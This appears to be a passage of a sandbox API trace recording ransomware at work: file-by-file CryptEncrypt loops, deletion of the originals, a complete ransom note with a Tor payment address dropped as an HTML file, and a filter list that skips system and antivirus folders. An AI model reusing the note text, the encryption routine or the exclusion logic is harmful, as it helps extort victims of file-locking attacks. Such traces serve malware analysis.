nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.938] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.938] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.938] GetLastError () returned 0x0 [0154.938] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.938] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.938] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.939] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.939] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.939] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.939] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.939] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.939] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.939] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.939] GetLastError () returned 0x0 [0154.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.940] GetLastError () returned 0x0 [0154.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.940] GetLastError () returned 0x0 [0154.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.940] GetLastError () returned 0x0 [0154.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.940] GetLastError () returned 0x0 [0154.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.940] GetLastError () returned 0x0 [0154.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.940] GetLastError () returned 0x0 [0154.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.940] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.941] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.941] GetLastError () returned 0x0 [0154.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.941] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.941] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.941] GetLastError () returned 0x0 [0154.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.941] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.941] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.941] GetLastError () returned 0x0 [0154.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.941] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.941] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.941] GetLastError () returned 0x0 [0154.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.941] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.941] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0154.941] GetLastError () returned 0x0 [0154.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0154.941] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0154.941] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0154.941] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui")) returned 0x20 [0154.942] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0154.942] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 1 [0154.942] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui")) returned 0 [0154.942] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" [0154.942] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 1 [0154.942] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\.xXD060.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\.xxd060.tmp")) returned 0xd060 [0154.943] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\.xXD060.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\.xxd060.tmp"), dwFlags=0x1) returned 0 [0154.943] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\.xXD060.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\.xxd060.tmp")) returned 1 [0154.943] CryptDestroyKey (hKey=0x9ad738) returned 1 [0154.943] wcslen (_String="OK") returned 0x2 [0154.943] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.943] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.943] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0154.943] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0154.943] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0154.943] FindNextFileW (in: hFindFile=0x9ad5b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0154.943] GetLastError () returned 0x12 [0154.943] FindClose (in: hFindFile=0x9ad5b8 | out: hFindFile=0x9ad5b8) returned 1 [0154.943] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0154.944] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.944] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.944] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0154.944] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.944] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.944] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0154.944] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.944] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.944] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.exe") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.dll") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.lnk") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.bat") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.ini") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.msi") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*.scf") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*pagefile.sys*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*NTUSER.DAT*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*AppData*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\winrar\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\java\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\windows\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\ESET\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\AVG\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\AVIRA\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*Atheros*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*Realtek*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*bootmgr*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*boot*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*boot*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*CONFIG.SYS*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*IO.SYS*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*MSDOS.SYS*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*NTDETECT.COM*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*ntldr*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*chrome*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*opera*") returned 0 [0154.945] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", pszSpec="*firefox*") returned 0 [0154.945] wcslen (_String="\\\\?\\") returned 0x4 [0154.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad578 [0155.079] wcscmp (_String1=".", _String2=".") returned 0 [0155.079] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.079] wcscmp (_String1="..", _String2=".") returned 1 [0155.079] wcscmp (_String1="..", _String2="..") 